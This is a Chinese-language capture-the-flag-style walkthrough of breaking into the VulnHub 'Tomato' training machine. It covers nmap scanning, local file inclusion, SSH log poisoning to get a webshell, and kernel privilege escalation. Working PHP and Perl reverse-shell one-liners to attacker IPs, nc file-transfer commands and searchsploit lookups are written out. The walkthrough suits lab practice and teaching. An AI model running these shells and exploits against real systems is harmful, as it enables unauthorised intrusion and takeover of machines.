Tomato靶机入侵
1、环境搭建
下载地址: https://download.vulnhub.com/tomato/Tomato.ova
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
2、信息收集
-
主机发现
使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24
192.168.110.137,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24
-
端口扫描
使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.137
靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。
3、漏洞探测
-
目录扫描
8888端口访问需要口令,80端口网站首页是一张西红柿图片,没有什么信息。使用dirsearch对网站进行扫描。
找到一个/antibot_image/ 目录,进而找到/antibots/目录
发现一个phpinfo页面,screenshot-3.jpg展示了网站开启了AntiBotPlugin插件
其他文件没发现扫描有价值的东西重点关注phpinfo页面,发现可能存在文件包含
远程文件包含是关闭了
成功包含passwd文件
-
包含日志文件,getshell
这里没发现有什么地方可以上传,只能看看有没有什么日志可以包含。
常见的Apache 日志路径
/var/log/apache/access.log /var/log/apache2/access.log /var/www/logs/access.log /var/www/html/logs/access.log /var/log/access.log均失败了。因为靶机开启了ssh服务和ftp服务可以尝试这两个服务的日志。最后成功包含ssh服务的日志。/var/log/auth.log
尝试登录,被记入日志。用户名写成一句话,蚁剑连接成功
4、权限提升
翻了一下靶机的文件没有发现是什么有用的线索,应该是要内核提权了
使用php反弹一个shell到本地
php -r '$sock=fsockopen("192.168.110.129",10086);exec("/bin/sh -i <&3 >&3 2>&3");'
需要url编码后才能执行,且蚁剑上不能执行,以前类似的环境试过,就python可以。但这里并不能执行python
后面测试可以使用perl反弹
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.233.131:9999");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
bash -i 获得一个交互式shell
查看系统内核
uname -a
cat /proc/version
查找可用exp
searchsploit 4.4.0-21
使用了第一个,失败了。上传一个提权辅助脚本linux-exploit-suggester到靶机,能够检测Linux内核/基于Linux的机器存在哪些本地权限提升漏洞
利用nc传文件(也可以用蚁剑,我这里学习一下用nc)
靶机:进入/tmp目录,开启监听
nc -nvlp 9999 > [接收报存文件名]
攻击机nc 192.168.110.137 9999 < [要传文件名] -w 1
靶机收到后,加执行权限:chmod 777 tq.sh 后再执行 ./tq.sh
在kali上检索此漏洞EXPsearchsploit -p 45010。第一个看了一下有点复杂这里用第二个。
本地编译后上传到靶机。最好在目标上面编译(有的exp会有影响),但目标上面没有gcc
蚁剑上传
加权执行成功,成功提权
1187
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
